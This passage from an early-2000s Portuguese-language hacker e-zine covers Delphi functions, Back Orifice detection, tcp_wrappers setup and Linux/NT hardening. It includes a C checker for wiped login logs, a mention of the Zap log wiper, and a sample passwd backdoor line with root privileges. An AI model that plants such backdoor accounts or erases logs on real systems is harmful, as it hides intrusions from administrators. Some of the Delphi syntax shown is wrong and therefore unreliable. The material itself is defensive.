Sintaxe: Insert(sequencia de caracteres, varial String,
posicao);

AnsiUpperCase
Converte o conteudo de uma String para letras maaiusculas.
Sintaxe: String resultante := AnsiUpperCase(String);

AnsiLoweCase
Converte o conteudo de um String para letras minusculas.
Sintaxe: String resultante := AnsiLowerCase(String);

						---end---

6. Conversao de formatos
Tem funcoes q convertem variaveis de um formato para outro.
Quando isso nao eh possivel, uma excecao eh gerada. Para
evitar ou tratar a msg de erro, eh recomendavel utilizar
estas funcoes dentro de blocos try ... except

StrTolnt
Converte uma variavel do tipo String para um Integer
Sintaxe: Integer := StrTolnt(String);

IntToStr
Este eh o contrario! Converte uma variavel do tipo 
Integer para um String
Sintaxe: String := IntToStr(Integer);

StrToFloat
Recebe uma variavel do tipo String e a converte em uma
variavel de ponto flutuante do tipo Real.
Sintaxe: Real := StrToFloat(String);

FloatTostr
Converte uma variavel do tipo Real em um String
Sintaxe: String := FloatToStr(Real);

DateToStr
Armazena a data de uma variavel em formato TDateTime em
um String seguindo a formatacao de data padrao do Windows.
Sintaxe: String := TDateTime := StrToDate(String);

TimeToStr
Armazena a hora de uma variavel no formato TDateTime em um
String seguindo a formatacao de hora padrao do Windows.
Sintaxe: String := TimeToStr(TDateTime);

StrToTime
Converte um String contendo uma hora na formatacao 
especificada pelo Windows em uma variavel do tipo
TDateTime.

						---end---

7. Funcoes Aritmeticas

Sqr
Eleva um valor em ponto flutuante ao quadrado
Sintaxe: valor := Srq(valor);

Sqrt
Retorna a raiz quadrada de um valor em ponto
flutuante
Sintaxe: valor := Srq(valor);

Ln
Calcula o logaritmo natural de um valor 
Sintaxe: valor := Ln(valor);

Sin
Calcula o seno de um angulo em radianos
Sintaxe: valor := Sin(angulo);

Cos
Calcula o cosseno de um angulo em radianos
Sintaxe: valor := Cos(angulo);


Matrizes
Para agrupar sequencias de caracteres de variaveis
de um mesmo tipo, eu recomendavel utilizar matrizes
para facilitar a organizacao dos dados

Matriz unidimensional
Declaracao: variavel : Array [Inicio..Fim] of tipo da variavel
Uso: variavel[posicao] := valor

Matrix multidimensional
Declaracao: variavel : Arrqy[Inicio..Fim,Incio..Fim,...] of tipo de variavel
Uso: variavel[posicao][posicao] ... := valor;

						---end---
8. Funcoes
Funcoes sao estruturas que permitem o organizamento de trechos
do codigo-fonte de acordo com sua utilizadade

Procedure
Identifica um trecho de codigo q nao precisa retornar nehum valor
Sintaxe: Procedure(valor de entrada);
declaracao de variaveis
begin
comandos
end;

Function
Trecho de codigo q deve retornar algum valor
Sintaxe: Function(valores de entrada) : valor de saida;
declaracao de variaveis
begin
comandos
end;

Result
Variavel de controle de uma Function q permite acesso 
a variavel de resultado
Sintaxe: Result := valor;

						---end---

9. Caixas de dialogo do Windows
Sao componentes nao-visuais; podem ser encontrados na 
guia Dialogs da IDE

TOpenDialog
Manipula a selecao de um ou mais arkivos para abertura

TSaveDialog
Permite a escolha ou definicao de um arkivo para gravacao

TFontDialog
Caixa de dialogo para a escolha de uma fonte e seus
atributos

TColorDialog
Caixa de dialogo para exibir um conjunto de cores, permitindo
que o usuario selecione uma cor padrao ou crie uma personalizada.

TPrintDialog
Confirma uma intencao de imprimir e permite q o usuario 
selecione os parametros de impressao

TPrinterSetupDialog
Permite a configuracao das impressoas instaladas

TFindDialog
Pede ao usuario q ele digite uma sequencia de caracteres a
ser procuradas

TReplaceDialog
Pede a digitacao de duas sequencias de caracteres para q o
programa possa substituir a primeira pela segunda

						---end---

10. Operadores Matematicos

Operador         Acao
+                Soma   
-                Subtracao
/                Divisao 
*                Multiplicao
div              Divisao inteira
mod              Resto da divisao inteira

						---end---

11. Operadores Logicos

Operador         Acao   
and              e  
or               ou
xor              ou exclusivo
not              nao (inverso) 
shl              Deslocamento de bits a esquerda    
shr              Deslocamento de bits a direita

						---end---

12. Tipos de Variaveis
As definicoes das variaveis abaixo eh compativel com versoes
superiores a 4 no Delphi

Variavel           Faixa                         Tamanho
Byte               0..255                         8-bits
ShortInt          -128..127                       8-bits
SmallInt          -32768..32767                   16-bits
Word               0.65535                        16-bits 
Longword           0..4294967295                  32-bits
Integer           -2147483648..2147483647         32-bits                     
Cardinal           0.4294967295                   32-bits                    
Longint           -2147483648..2147483647         32-bits                       
int64             -2^63..2^63-1                   64-bits                       
Real48             2.9 x 10^-39..1.7 x 10^38      6 bytes                      
Single             1.5 x 10^-45..3.4 x 10^38      4 bytes                       
Double             5.0 x 10^-324..1.7 x 10^308    8 bytes                       
Extended           3.6 x 10^-4951..1.1 x 10^4932  10 bytes                      
Comp              -2^63+1..2^63-1                 8 bytes                   
ShotString         0 a 255 caracteres             256 bytes                  
String             0 a 2 gigabytes                entre 4 bytes
                                                  e 2 gigabytes                        
						
						---end---
13. Conclusao
Sem mais, apenas estude e estude!
=)                 
	   
										    Gotoxy
					                                  gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [06]
==[ Poesia 31337 ]==
==[ Por Gotoxy   ]==

31337 = eleet = 7A69 = 111101001101001 :)

Hmm... isso parece familiar, certu? 
pois eh muito conhecido essa famosa
porta. Esta eh a porta que  o nosso 
querido BO (Back Orifice) abre, por 
default, quando acessa a makina  do 
user vitima. 

						Muitos, no inicio da "carreira",
						procuram  por trojans p/ invadir
						pessoas  inocentes que nao fazem
						parte do "jogo".  Os mais usados
						por eles eh o famoso BO. Existem
						diversos outros, porem , este eh
						um dos mais complexos e portanto
						eh um dos mais usados atualmente	

Continuando o nosso assunto do trojam BO,
vou ensinar as pessoas inocentes que nao 
fazem parte do "jogo" como  se  proteger 
dos  estupidos  "hackers"  (entre  aspas  
pois nao sao hackers porra nenhuma)  que 
invadem seu computador  e  que faz altos 
estragos no mesmo. 

						Em primeiro lugar, o  culpado disso tudo,
						foi o  grupo cDc (Cult of Dead Cow), pois
						eles que projetaram o BO.Em segundo lugar,
						o culpado sao os "hackers" que pegam o BO
						e sai por ai fazendo estragos em  makinas
						alheias...

Nesta estrofe, vou ensinar como se defender...
Primeiro, vamos ver se sua makina esta afetada
Entre no prompt do msdos e digite: netstat -na   
O netstat eh apenas um programa para monitorar
a rede do windows. 

Caso aparecera algo como:

TCP 0.0.0.0:31337 0.0.0.0:0
LISTENIG
UDP 0.0.0.0:31337 *:*

Voce certamente estara correndo um grande perigo!
Note que  as conexoes  TCP e UPD  na porta 31337 
estao  ativas em estado  de  Listening,  ou seja,
estao a espera de conexoes externas.A porta 31337 
eh padrao, entao, se o invasor ter um neuronio no 
cerebro, ele trocara esta porta por outra. 

						Finalmente a melhor  parte  da poesia:
						Como fazer para  remover  este  diabo 
						do meu corpo?  Bom, ja  existe varios
						programas com esta finalidade.  Entao,
						pegue o AntiGen (removedor do BO).Pois
						eh melhor do que ficar removendo essas
						porcarias manualmente. Voce pode encon
						trar ele no site www.arez.com/fs/antigenl
						Voce tb pode pegar o BO Detect que eli
						mina vestigios do BO de sua makina de
						forma rapida e eficaz. Voce pode pegar
						ele no site: www.ultraglobe.com/backorifice

Apesar de ter maneiras eficaz
de retirar o BO de sua makina
manualmente, (bastando apenas 
alterar algumas configuracoes 
no registro do  windows  para
isso) o melhor  metodo  ainda  
eh  utilizando  os  programas 
citados acima.
						Com isso voce ficara livre e tranquilo
						dos invasores. Para voce se proteger e
						ficar mais tranquilo ainda,pegue algum
						firewall bom. Procure algum para downl
						oad no site: www.superdownloads.com.br
						
Okay, chegamos no final desta  materia.
Espero ter passado uma pequena  experie
ncia aos usuarios mais leigos que agora
estao conhecendo a famosa rede de compu
tadores chamada I-N-T-E-R-N-E-T !!!!!!!

						Fim da Poesia! 

Bah! Coloquei Poesia 31337
pois a forma do txt parece
estrofes! :)						               Gotoxy
					                                 gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.
							
									
									






SETOR [07]
==[ Tcp Wrappers ]==
==[ Por Gotoxy   ]==

Eh o seguinte, suponhamos que voce queira q determinadas makinas possam
acessar sua makina. Porem, vc nao quer que outras makinas nao entrem no
seu sistema. Entao, voce deve proceder da seguinte forma:

Passo -(1)-
Primeiramente, eh necessario vc possuir o tcp_wrappers. caso
vc nao tenha ele instalado no seu sistema, pegue ele seguinte 
site: 

ftp://ftp.porcupine.org/pub/security/tcp_wrappers_7.6.tar.gz


Passo -(2)-
---
Instalando - Metodo 1 -

Para esse metodo nao eh necessario fazer o download
do tcp_wrappers, conforme dito em algumas linhas 
acima!

Caso voce tenha um cd de alguma distribuicao linux, 
basta voce entrar no diretorio onde se localiza os
RPMS e procura por tcp_wrapers.Acompanhe o exemplo:
bash# cd /mnt/cdrom
bash# cd linux/rpms
bash# ls -la tcp*
tcp_wrappers_7.6.rpm
bash# rpm -ivh tcp_wrappers_7.6.rpm
Depois disso ele jah estarah instalado! 
---

Instalando - Metodo 2 -

Caso vc nao tenha o cdrom de nenhuma distribuicao
eh necessario vc fazer o donwload do tcp_wrappers,
conforme vc v no 'Passo -(1)-'.

Crie um um diretorio para o tcp_wrappers, escolha
qquer nome para a pasta. Depois, entre no dir dele.
Depois, descompacte ele. Depois digite:
make REAL_DAEMON_DIR=/usr/sbin linux 
e depois vc tem q digita:
make install

Acopanhe o exemplo:

bash# mkdir wrappers
Entra no diretorio
bash# cd wrappers
Descompacte ele.
bash# tar zxvf tcp_wrappers_7.6.tar.gz
Digite agora:
bash# make REAL_DAEMON_DIR=/usr/sbin linux
Depois digite:
bash# make install
---

Passo (3)
Modifique os banners 
Os banners conteem as mensagens que serao mostradas quando
o tcpd for chamado pra algum servico em particular. Crie o 
diretorio dos banners assim:
bash# mkdir /usr/local/etc/banners

Para cada servico que vc quiser banner crie um arquivo 
dentro desse diretorio assim:
/usr/local/etc/banners/in.telnetd << para telnet
/usr/local/etc/banners/in.fingerd << para finger
/usr/local/etc/banners/in.ftpd    << para ftp
/usr/local/etc/banners/in.httpd   << para http
                       etc

Eh permitido apenas uma linha nos banners, digite algo como:
"Voce nao estah autorizado a utilizar este servico."

Passo (4)
Agora voce tem que editar o /etc/hosts.deny
bash# cd /etc
bash# vi hosts.deny

Entenda:
O hosts.deny serve para voce bloquear servicos ao inves de 
libera-los (q eh o caso do hosts.allow).

Ele funciona assim: 
servico: (all | rede | ip)

Entenda:
servico: servico a ser bloqueado (ex: pop,ssh,ftp,imap,etc)
all: bloqueia todos os acessos
rede: libera acesso a uma rede especifica
ip: libera acesso a um ip especifico

Exemplo:

in.ftpd : ALL : banners /usr/local/etc/banners/ 
     |        |                  |                     
     |-> servico que voce quer controlar, aqui no exemplo eh o ftp
              |-> host que nao pode ter acesso.Aqui no exemplo todos
                  os hosts estao banidos.Para bloquear apenas p/ uma
                  determinada makina, pode colocar por exemplo assim: 
                  gotoxy.org - somente os kras logados do gotoxy.org 
                  nao podem entrar na sua makina.                       
                                 |-> local do banner

Quando o kra conectar na sua maquina no daemon que voce escolheu vai
aparecer o banner pra ele. Para banir todos os daemons, basta editar 
o hosts.deny e colocar:

ALL : ALL : banners /usr/local/etc/banners 

Sendo assim, ele vai banir todos os daemons e tb vai banir todos os 
hosts que tentarem conectar na sua makina.

Passo -(5)-
Ponha o tcp wrapper no /etc/inetd.conf assim:
ex:

#ftp    stream  tcp     nowait  root    /usr/sbin/ftpd       in.ftpd -l -a
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd       in.ftpd -l -a
                                                       
Ao invez de o servico ir direto para o daemon ele passa pelo tcp_wrapper
para ver se pode ou nao rodar.Voce pode coloca-lo em qualquer daemon que 
quiser.

Passo -(6)- 
Agora basta reiniciar o inetd assim:
bash# killall -HUP inetd

Blza! Agora jah esta tudo funcionando corretamente, caso
voce tenha feito tudo certinho, conforme foi ensinado 
akih! =] Sem mais. 

										    Gotoxy
					                                  gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.
							




					



SETOR [08]
==[ Protegendo o seu sistema  ]==
==[ Por Gotoxy                ]==

						
				(oOo)--[ Protegendo o seu sistema ]--(oOo)
                                                                                            
                                                              
Indice
Capitulo 1: Introducao
Capitulo 2: Como proteger o meu NT ?
Capitulo 3: Como proteger o meu Linux?
Capitulo 4: Conclusao
					


##################################
##### Capitulo 1: Introducao #####

Chega de hacking e vamos ser um pouco anti-cracker agora.
Neste texto, irei abordar o seguinte tema: como se livrar
de ataques dos malditos crackers q prejudicam eu e  o meu
querido sistema, principalmente. Isso mesmo, vamos ajudar
os frageis administradores. Isso eh necessario para hacks
tb pois, alem de saber de ataques, tem q saber algo sobre 
seguranca! 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1n1c14nDo C4p 2...
				Capitulo 2: Como proteger o meu NT? 

    O NT tem o seu lado ruim e o seu lado bom. Muitos users linux e outros 
usuarios criticam o nt soh por existir muitas falhas. Porem, ele tem altas 
coisas boas tb.  Como todos nos sabemos,nenhum sistema eh perfeito.Como o 
nt eh muito usado,muitos descobrem suas falhas.
    O administradores que utilizam o nt, tem que ter cuidado principalmente
no servidor IIS,pois ele eh vitima de muitos ataques, como: ataques de ddos, 
rds, etc. Portanto, nao deixe de atualizar sempre o Service Pack, para voce
obter as correcoes dos bugs mais conhecidos.

c:\winnt\system32> O que fazer logo apos sofrer um ataque???

Administrador, nao seja burro, se voce sofrer um ataque, nao formate seu computador ou 
algo do genero..a melhor solucao eh achar o intruso! Mas,o que fazer depois q eu achar 
o maldito cracker? Pow meu amigo admin,q pergunta mais burra! Basta voce ligar pro 911
e processar o cara! heheh, nao seja tao mal assim, apenas ligue para a casa dele e con
versa com o pai dele, falando pra ele cortar a internet do filho dele pois ele esta fa
zendo coisas indevidas na internet. bah! Chega de fala mansa (forro rox! ) e vamos aos 
textos de como se proteger...


c:\winnt> cd..
c:\> Como rastrear o invasor???

Como  eu jah disse acima, desligar o computador ou formatar o hd, nao sao atitudes que
devem ser tomadas. Tirar o sistema da rede eh o suficiente! Agora, ainda  sem desligar
o pc, voce deve notificar o NBSO (Nic.br Security Office) no e-mail  nbso@nic.br. Alem
de contabilizar as estatisticas de incidentes na net,o NBSO atua diretamente nos casos
,acompanhando e auxiliando na deteccao dos intrusos! 

 Um outro metodo de se localizar um invasor, eh utilizando os arquivos de logs.  Por 
 motivos de preguica, copieei esse texto abaixo q foi escrito por Phineas Phreak! 
 Phineas Phreak, espero que nao se importe! :) 
						

						--por Phineas Phreak--
 
O IIS4 possui um sistema interessante de log que pode ser facilmente configuravel por 
qualquer administradores.O simples ato de se manter um sistema de logs no IIS,podendo 
controlar o acesso nos servicos http, e ftp.

Bom, sem mais demoras, na tentativa de fazer um texto dinamico,  ai vao as 
tecnicas...
 
==[ Configurando log WWW (http): ]==

Quando olhando para um arquivo de log, voce deve ter na mente que as infor
macoes necessarias deverao estar facilmente dispostas para que a visao  do
administrador sobre o log seja rapida e conclusiva :) 
Os arquivos LOG, podem te dar historicos sobre conexoes feitas sobre deter
minados IP addresses, que ultimamente visitaram o seu site,  contendo toda
a documentacao de troca de dados ftp,  ou http,  entre  outras informacoes
que podem garantir um pouco mais a seguranca do seu site ou servidor. Basi
camente estas sao as maravilhas que o arquivo de log do IIS pode fazer por
voce.

Passo-a-passo, para configurar o sistema de log:
1. Selecione iniciar|Programas|Windows NT 4.0 Option Pack| Microsoft Inter
net Information Server| Internet Service Manager (ISM)|  e logo apos  isto
ira abrir-se uma janela chamada MMC (Microsoft Management Console).
2. Clique com o botao-direito do mause, no website que voce deseja configu
rar.
3. Clique no botao de propriedades. Entao aparecera a janela de proprieda-
des do website...
4. Clique em "Enable Logging".
5. E entao escolha a opcao de log que mais se adequa ao seu sistema.

Veja:

 .Microsoft IIS log Format.  Este eh fixado no formato ASCII de texto, ele
 loga os acessos nos seguintes items:

	- Username
	- IP address
   	- Numero de bytes recebidos
	- Codigo de status do HTTP
 	- Data requisitada no sistema
	- Tempo de conexao ao sistema
 
 Este log e em formato ASCII o que permite que seja visto em quase todos os
 editores de textos de todas as OSs que voce imaginar.

--

 .NCSA Common Log File Format. Este tambem e' baseado em formato ASCII, su- 
 portato pode National Computer Supercomputing Applications  (NCSA).  Neste
 log, ele grava as seguintes informacoes:

	- UserName Remoto
	- username
	- Codigo de status do HTTP
	- Tipo de arquivo requisitado
	- numero de dados requisitados
	- Tipo e numero de arquivos recebdiso pelo servidor

 Basicamente igual ao IIS. :)

--

 ODBC logging. Suportado pelo tipo de arquivo que eh anexado a uma database
 este log grava as seguintes informacoes:

	- IP address
	- username
	- data requisitada
	- data recebida
	- byte enviados
	- acoes executadas pelo cliente
	- Host de onde veio e para onde foi. :)

 Este log e anexado a um certo grupo de arquivos, permitindo que voce somen
 te grave o log de acoes em determinados em diretorios, como o de usuarios,
 e ou ate de todo o servidor. E' necessario determinar isto antes de habili
 tar este log.

--
 
 W3C Extended Log File Format. Ate agora, este e' o melhor log ja testado e
 usado para databases IIS 4.0 e outras em toda a minha vida, ele faz syslog
 parecer codigo de crianca perto dele :)
 Usando um sistema ASCII de log, esta e' a opcao padrao usada pelo IIS, em-
 bora eu aconselho que voce nao mude-a. 
 Voce pode acrescentar varias configuracoes a este log, que estao dispostas
 nesta mesma janela, mas na opcao padrao voce tem os seguintes componentes:

	- IP address
	- IP address do servidor
	- Porta do Servidor
	- Codigo de status HTTP
	- Data solicitada
	- Tempo de download da data.

 A data e' separada em espacos neste formato de log.
 Para acrescentar mais componentes no log, faca o seguinte:
 
 1. Clique no botao de propriedades.  Entao a janela "Extended Logging Pro-
 perties". 
 2. Na secao "New Log Time Period", coloque o tempo em que voce quer  que o
 IIS crie um arquivo de log, para o website selecionado,  voce pode colocar
 a opcao para somente criar  o log quando for 20:00h. da noite,  assim voce 
 pode acessar o log assim que voce chegar do trabalho :)
 3. Entre o diretorio do qual voce quer guardar o log dentro:
 O padrao e' %WinDir\System32\LogFiles.  Clique no browser para  selecionar
 outro diretorio.
 4. Clique na opcao "Extended Properties tab" para mostrar as opcoes de log
 que o W3C oferece (esta opcao sera mostrada quando voce selecionar a opcao
 W3C Extended Log File Format). Voce pode acessar esta opcao,  acessando  a
 opcao describe (descricao) na tabela no.1, a opcao de default do W3C.  in-
 cluem as opcoes mostradas acima. E as novas opcoes:

	- Data da atividade
	- Tempo da atividade
	- Endereco IP do cliente
	- Endereco IP do servidor
	- User Name
	- Nome do Servidor
	- Porta do servidor
	- Acao que o cliente executo (METHOD)
	- Mostra as atividades no seu sistema URI, como as paginas que o usua
   	  rio acessou, como pagina HTML e programas CGI.
	- URI Query, Loga as strings que o usuarios tentou acessar que falha-
  	  ram ou funcionaram.
	- Win32 Status, status do cliente em acao.
	- Bytes enviados
	- Bytes recebidos
	- Agente do usuario.
	- Cookie mandados ou recebidos.
	- Referrer, URL do usuario.

 Lembramos que com tanta opcao, voce pode ativar todas estas, mas o seu ar- 
 quivo de log pode chegar a 19mb ou ate 300mbytes em dias ou semanas, entao
 procure sempre tacar o lixo fora :)

					--por Phineas Phreak--
 
 Espero com isso ter ajudado aos administradores do NT! 
 Ah! Nao se esqueca: "O sistema nao domina o usuario! O usuario domina o sistema!"

 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1n1c14nDo C4p 3...
				Capitulo 3: Como proteger o meu Linux? 

O lnx tb tem seu lado ruim e o seu lado bom! Na verdade,todos os sistemas operacionais
tem o seu lado bom e o seu lado ruim! Existem muitas vulnerabilidades no linux que pod
emos explorar com exploits, etc... 


Vou falar aki de alguns metodos de como se proteger dos terriveis crackers =] Isu akih
vai tb para todos os fucadores em geral.. pois, alem de saber atacar, tem que saber de
como se proteger.. ah, chega de papo mole! Veja abaixo algumas dicas...

			
######################################################################################
######## Algumas dicas para sua protecao #############################################
######################################################################################

(1)- Password
Como nossa primeira dica, vou falar do password q voce deve escolher para trabalhar no
linux. Caso trabalhe em uma rede, voce deve ter mais cuidado ainda. Porque? Meu amigo,
existem programas como os famosos sniffers que capturam a senha q  ficam trafegando na
rede, por isso, voce deve ser preocupar muito com isso.Portanto, quanto mais uma senha
bem esquematizada, mais dificil sera descoberta. Ah! Existe programas de brute force q
tem o papel de tentar descobrir senhas de uma rede atraves de uma wordlist. O que eles
fazem nao tem segredo! Apenas fazem uma combinacao de senhas ateh descobri-la.E quanto
a wordlist, ela eh apenas um arkivo q contem um tanto de palavras que serao combinadas
Para voce escolher uma password bem dificil, voce deve misturar letras e numeros. Asim
um programa de bruta forca nao seria capaz de descobrir uma senha deste tipo. Por exem
plo, pense em um palavra. Suponhamos que a palavra seja teto. Entao, voce substitua as
letras por palavras. Entao,no nosso exemplo, ficaria: 7370. Onde: T = 7, E = 3 e o = 0
(zero). Agora, depende de voce.Escolha uma palavra e troque algumas letras por numbers
Obs: use a palavra do seu password utilizando + de 6 caracteres.A maioria dos sistemas 
suporta ateh 8 caracteres. 

(2)- Logs
Para os administradores que nao sabem, os logs sao apenas um arkivo que registram tudo  
que acontecem em uma estacao ou servidor.Com eles eh possivel identificarmos o invasor
que acaba de acessar a sua makina. Os crackrs q tem uns neuronios funcionando, nao vai
sair da makina enquanto nao apagar os  logs  do  sistema.  Porem,  existem  logs  mais 
eficientes para o intruso deixar pistas. Vamos falar mais um pouco de teoria: o daemon
responsavel por gerar logs no sistema eh o Syslog.Ele nao apresenta muitas informacoes
causando assim a uma dificil deteccao do invasor. Um programa bom para  uma  acao  bem
eficiente eh o programa tcp wrapper. Caso ele nao esteja na sua distribuicao,pegue ele
no seguinte endereco: ftp://ftp.porcupine.org/pub/security/tcp_wrappers_7.6.tar.gz  :)
Existe um software chamado tripwire que realiza uma assinatura de todos os arquivos de
uma particao linux e em seguida gera uma base da dados. Essa base de dados fica armaze
nado em outra makina por questoes de seguranca e pode ser comparada com o disco  atual
para  saber quais arquivos foram alterados. A ultima versao dele voce encontra no end:
www.triwiresecurity.co

Caso seu sistema seja invadido,certamente o invasor que pegasse root no seu system nao
sairia do mesmo sem apagar os logs.Um dos mais usados programas para se apagar os logs
eh o Zap, pois ele apaga seus rastros no wtmp,utmp e lastlog.Portanto,se voce foi alvo
de um ataque e os seus logs foram apagados,nao se preocupe! Abaixo segue um programa q 
analisa o wtmp,utmp,lastlog e olha se eles foram alterados e tb olha por qual user que
foi alterado:

---------------------------logs.c---------------------------
#include <stdio.h>
#include <utmp.h>
#include <lastlog.h>
#include <string.h>
#include <time.h>
#include <errno.h>
#include <shadow.h>
#include <pwd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define UTMP "/etc/utmp"
#define UTMP2 "/var/run/utmp"
#define WTMP "/etc/wtmp"
#define WTMP2 "/var/log/wtmp"
#define LASTLOG "/var/log/lastlog"
#define SIM 1
#define NAO 0
#define MAX 14
#define NL putchar('\n')
#define BEEP putchar(7)

typedef char boolean;

struct user{
       struct utmp u;
       struct user *p;
       }*s;

struct utmp cmp;
struct lastlog cmp2;

void insere(struct utmp *);
void print(struct user *);
void ajuda(const char *);
void print_wtmp(struct user *);
boolean procura(struct user *, const char *);
boolean bash_history(const char *);
void never_login(const char *, const char *);

void main(int argc, char *argv[]){

struct utmp actual;
struct lastlog actual2;
struct spwd *utilizador;
struct passwd *username;

boolean intrusao=NAO,
        resto=SIM,
        beep1=NAO;
int intrusoes=0,
    i;

int fd;

time_t hora;
  
  for(i=0; i<argc; i++)
     if(argv[i][0]=='-')
       switch(argv[i][1]){
       case 'h':{
                 ajuda(argv[0]);
                 exit(0);
                }
       case 'b':{
                 beep1=SIM;
		 break;
                }
       case 'u':{
                 resto=NAO;
                 break;
                }
       default:{
                puts("Opcao desconhecida");
                exit(1);
                }
       }


  s=NULL;
  memset(&cmp, 0, sizeof(struct utmp));    
  memset(&cmp2, 0, sizeof(struct lastlog));   

  if((fd=open(UTMP, O_RDONLY))<0){
    if((fd=open(UTMP2, O_RDWR))<0){
      perror("utmp");
      exit(1);
      }
     }
 
  time(&hora);
  printf("%s\n", ctime(&hora));
 
  printf("Analizando entradas do 'utmp'...\n");
  while(read(fd, &actual, sizeof(actual))>0){
    if(!memcmp(&actual, &cmp, sizeof(struct utmp)))
      intrusao=SIM;
      insere(&actual);
  }
  

  
  if(intrusao){
    NL;
    if(beep1)
      BEEP;
    printf("**********\n");
    printf("* AVISO: * As entradas do 'utmp', foram manipuladas!!!!!\n");
    printf("**********\n");
    printf("Users correctamente logged on:\n");
    printf("User\t\tLogged on em\tdev\n");
    print(s);
    printf("Faca 'ps -aux' para procurar processos de users ilegais!\n");
    } 
  else
   puts("OK!");
  
  if(!resto)
    exit(0);
 
  printf("----------------------------------\n");

  if((fd=open(WTMP, O_RDONLY))<0)
    if((fd=open(WTMP2, O_RDONLY))<0){
      perror("wtmp");
      exit(1);
    }
  
  NL;

  printf("Analizando entradas do 'wtmp'...\n");
    
  s=NULL;
  while(read(fd, &actual, sizeof(struct utmp))>0){
    if(!memcmp(&actual, &cmp, sizeof(struct utmp)))
        intrusoes++;
        insere(&actual);
  }
 
     
  if(intrusoes!=NAO){
    printf("Foram 'apagadas' um total de %d entradas!\n\n", intrusoes);
    print_wtmp(s);
    }
   else
    puts("OK!");
   

  printf("----------------------------------\n");
  
  if(getuid()!=0)
    if(fopen("/etc/shadow", "r")==NULL){
      printf("Precisa ser root para continuar!!\n");
      exit(1);
      } 

  if((fd=open(LASTLOG, O_RDWR))>=0){
    printf("Analizando entradas do 'lastlog'...\n");
    intrusoes=0;
 
    puts("Utilizadores com entradas 'apagadas':");
    while((utilizador=getspent())!=NULL){
      if(utilizador->sp_pwdp[0]!='*'){
        username=getpwnam(utilizador->sp_namp);
        lseek(fd, username->pw_uid * sizeof(struct lastlog), SEEK_SET);
        if(read(fd, &actual2, sizeof(struct lastlog))==-1){
          perror(LASTLOG);
          break;
	  }
        if(!memcmp(&cmp2, &actual2, sizeof(struct lastlog))){
          if(procura(s, utilizador->sp_namp)){
            intrusoes++;
            printf("-> %s\n", utilizador->sp_namp);
	    }
          else
           if(bash_history(username->pw_dir)){
             intrusoes++;
             printf("-> %s\n", utilizador->sp_namp);
	     }
	   else
	     never_login(utilizador->sp_namp, username->pw_dir);
	  }
       }
   }
}
else
  {
   printf("Nao foi possivel localizar o ficheiro 'lastlog'\n");
   exit(1);
  }

  if(intrusoes!=NAO)
    printf("\nForam apagadas pelo menos %d entradas\n", intrusoes);
    else
       puts("\nOK!");
             
}

void insere(struct utmp *k){
struct user *novo;

  if((novo=(struct user *) malloc(sizeof(struct user)))==NULL){
    puts("Erro a alocar memoria!");
    exit(1);
    }

  memcpy(&novo->u, k, sizeof(struct utmp));
  novo->p=s;
  s=novo;
}


void print(struct user *x){

  if(x==NULL)
    return;

  if(!memcmp(&x->u, &cmp, sizeof(struct utmp)))
    printf("??????\t\t??????\t\t??????\n");
  else
   if(x->u.ut_type >=7 && x->u.ut_type <=8)
     printf("%s\t\t%s\t\t%s\n", x->u.ut_user, x->u.ut_host, x->u.ut_line);
 
  print(x->p);

}

void print_wtmp(struct user *x){

   if(x==NULL)
     return;

   if(!memcmp(&x->u, &cmp, sizeof(struct utmp))){
    printf("entrada 'apagada' depois de:\n");
    if(memcmp(&x->p->u, &cmp, sizeof(struct utmp))!=0){
     printf("%s", ctime(&x->p->u.ut_time));
     if(x->p->u.ut_type >=7 && x->p->u.ut_type <=8)
       printf("(%s)\n", x->p->u.ut_name);
    }
    else
     printf("????????????????????????\n");

     NL; 
   }

   print_wtmp(x->p);
}

void ajuda(const char *s){
printf("======Zines-br Labs 2000=====\n");
printf("Uso: %s [-opcoes]\n", s);
printf("        -h imprime este help e sai\n");
printf("        -b beep ao encontrar anomalias\n");
printf("        -u apenas testa utmp\n");

}

boolean procura(struct user *x, const char *s){

   if(x==NULL)
     return(NAO);

   if(!strcmp(s, x->u.ut_name))
     return(SIM);

   procura(x->p, s);
}


boolean bash_history(const char *s){
static char *dir;

  if((dir=(char *) malloc(strlen(s)+14))==NULL){
    puts("Erro a alocar memoria!!");
    exit(1);
    }

  sprintf(dir, "%s/.bash_history", s);

  if(fopen(dir, "r")==NULL)
    return(NAO);

    return(SIM);

} 

void never_login(const char *s, const char *dir){

printf("?? %s\n", s);
printf("nao possui nenhuma entrada em 'wtmp'\n");
printf("o arquivo '%s/.bash_history' nao existe\n", dir);
printf("provavelmente nunca usou o sistema!!\n");
}
---------------------------logs.c---------------------------

Creditos:
   Nao sei o autor do programa acima.
   Achei ele na Rwx05
 

(3)- Scan
Um scan eh um apenas um programa que scaneia um host. Ele scaneia portas, olha as vuln
erabilidades, olha os cgi's encontrados, etc. Ele eh muito util mesmo, quanto  para  o 
invasor quanto para administrador. Existem varios scaneadors, como:  Vetescan,  Sscan,
Nmap, etc. Porem, o que mais se destaca eh o Nmap. Voce pode encontrar ele no  site da
insecure, cujo endereco eh www.insecure.org/nmap. Se o seu sistema tem suporte a files
(arquivos) RPM eh possivel instalar o programa vida rede. Utilize o  seguinte  comando
para  isso: [seu@host]# rpm -vhU http://www.insecure.org/nmap/dist/nmap-2.53.1.i386  e 
depois:  [seu@host]# http://www.insecure.org/nmap/dist/nmap-frontend-0.2.53.1.i386.rpm

(4)- Achando rastros
Caso seu sistema seja invadido, a primeira coisa que se deve fazer eh sair da rede.Nao
desligue ou formate seu computador. Antes de tomar atitudes como estas, voce deve proc
urar rastros deixados pelo invasor, como por exemplo backdoors. Bom,vamos comecar pela
backdoor mais simples, que instalada no arquivo passwd, localizado no diretorio /etc. 

Segue o exemplo:
[meuhost]# grep ":0:0:" /etc/passwd
root:x:0:0:root:/root:/bin/bash
root:x:0:0:Joao Leite:/root:/bin/bash
nerdizin::0:0::/:/bin/sh
				
Pronto, achamos rastros. Agora, basta voce apagar a linha: nerdizin::0:0::/:/bin/sh
